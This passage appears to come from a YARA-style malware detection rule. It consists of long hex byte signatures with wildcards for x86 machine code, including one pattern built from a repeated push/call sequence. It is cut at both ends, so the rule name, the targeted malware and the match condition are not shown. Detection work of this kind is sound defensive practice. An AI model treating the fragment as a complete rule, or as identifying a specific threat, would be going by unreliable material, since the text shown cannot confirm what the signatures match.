?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 83 ?? ?? ?? 8B ?? 74 ?? E8 ?? ?? ?? ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 89 ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 6A ?? 8B ?? ?? ?? ?? ?? 8D ?? ?? ?? 51 6A ?? 57 FF ?? 85 ?? 74 ?? 8B ?? ?? ?? 89 ?? ?? 83 ?? ?? 74 ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 2B ?? 3D ?? ?? ?? ?? 77 ?? 83 ?? ?? ?? 75 ?? 5B 5F 5E 8B ?? 5D 83 ?? ?? C3 BD ?? ?? ?? ?? 5B 5F 5E 8B ?? 5D 83 ?? ?? C3 5F 5E 33 ?? 5D 83 ?? ?? C3 83 ?? ?? 55 8B ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? 53 33 ?? 57 33 ?? 89 ?? ?? ?? 89 ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 8D ?? ?? ?? 8B ?? ?? ?? ?? ?? 51 57 57 6A ?? FF ?? ?? FF ?? 85 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 8D ?? ?? ?? 8B ?? ?? ?? ?? ?? 51 FF ?? ?? ?? FF ?? ?? ?? 6A ?? FF ?? ?? FF ?? 85 ?? 74 ?? 33 ?? 39 ?? ?? ?? 76 ?? 8B ?? ?? ?? 0F 1F ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? FF ?? 89 ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? FF ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? 47 46 83 ?? ?? 3B ?? ?? ?? 72 ?? 8B ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 53 8B ?? ?? ?? ?? ?? 57 FF ?? 33 ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 46 3B ?? 72 ?? 53 E8 ?? ?? ?? ?? 83 ?? ?? 5E E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 6A ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 5F 5B 85 ?? 74 ?? 8D ?? ?? ?? 50 FF ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 55 E8 ?? ?? ?? ?? 83 ?? ?? 33 ?? 5D 83 ?? ?? C2 ?? ?? CC CC CC CC CC CC CC CC CC CC CC CC 83 ?? ?? 56 8B ?? ?? ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 6A ?? 8B ?? ?? ?? ?? ?? 56 FF ?? 85 ?? 74 ?? 8D ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 56 8B ?? ?? ?? ?? ?? FF ?? 33 ?? 5E 83 ?? ?? C2 ?? ?? CC CC CC CC CC CC 83 ?? ?? 83 ?? ?? ?? ?? ?? ?? 53 56 57 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 ?? ?? ?? 0F 84 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 8B ?? ?? ?? ?? ?? FF ?? 8B ?? 89 ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? 66 0F 1F ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D ?? ?? ?? 51 8D ?? ?? ?? 8B ?? ?? ?? ?? ?? 51 8D ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 6A ?? 55 FF ?? 85 ?? 0F 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? ?? 85 ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? 51 8D ?? ?? ?? 8B ?? ?? ?? ?? ?? 51 8D ?? ?? ?? 51 FF ?? ?? ?? 56 6A ?? 6A ?? 55 FF ?? 85 ?? 0F 84 ?? ?? ?? ?? 33 ?? 33 ?? 89 ?? ?? ?? 39 ?? ?? ?? 0F 86 ?? ?? ?? ?? 0F 1F ?? ?? ?? ?? ?? FF ?? E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 75 ?? FF ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? 8B ?? ?? ?? ?? ?? 55 FF ?? 89 ?? ?? ?? 85 ?? 74 ?? 6A ?? E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? 8B ?? ?? ?? 8D ?? ?? ?? ?? ?? ?? 51 89 ?? ?? 8B ?? ?? ?? 53 89 ?? ?? E8 ?? ?? ?? ?? 8B ?? 83 ?? ?? 85 ?? 74 ?? 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 89 ?? ?? 47 8B ?? ?? ?? 8B ?? ?? ?? 83 ?? ?? 40 89 ?? ?? ?? 3B ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 ?? 74 ?? 85 ?? 74 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 53 8B ?? ?? ?? ?? ?? 57 FF ?? 33 ?? 85 ?? 74 ?? 0F 1F ?? ?? E8 ?? ?? ?? ?? FF ?? ?? 8B ?? ?? ?? ?? ?? FF ?? 46 3B ?? 72 ?? 53 E8 ?? ?? ?? ?? 83 ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B ?? ?? ?? ?? ?? FF ?? E9 ?? ?? ?? ?? 5D 5F 5E 33 ?? 5B 83 ?? ?? C2 ?? ?? CC CC CC 83 ?? ?? 53 55 8B ?? ?? ?? 56 57 85 ?? 0F 84 ?? ?? ?? ?? 8B ?? ?? 8D ?? ?? ?? 51 6A ?? 55 C7 ?? ?? ?? ?? ?? ?? ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? 52 50 8B ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 6A ?? 8D ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 33 ?? 83 ?? ?? B8 ?? ?? ?? ?? 66 ?? ?? ?? ?? 39 ?? ?? ?? 0F 8E ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? 50 83 ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? 43 8B ?? 89 ?? ?? ?? 0F 10 ?? ?? ?? 8B ?? 51 0F 11 ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? 52 50 8B ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? C7 ?? ?? ?? ?? ?? ?? ?? 33 ?? 52 50 8B ?? FF ?? ?? 83 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF ?? ?? ?? E8 ?? ?? ?? ?? 83 ?? ?? 85 ?? 0F 85 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? 89 ?? ?? ?? 52 50 8B ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? 89 ?? ?? ?? 52 50 8B ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 8B ?? ?? ?? 8D ?? ?? ?? 89 ?? ?? ?? 52 50 8B ?? FF ?? ?? 85 ?? 0F 88 ?? ?? ?? ?? 33 ?? }
    $pattern3 = { CC CC CC CC CC 55 8B ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? FF ?? ?? ?? ?? ?? FF ?? ?? ?? ?? ?? 68 ?? ?? ?? 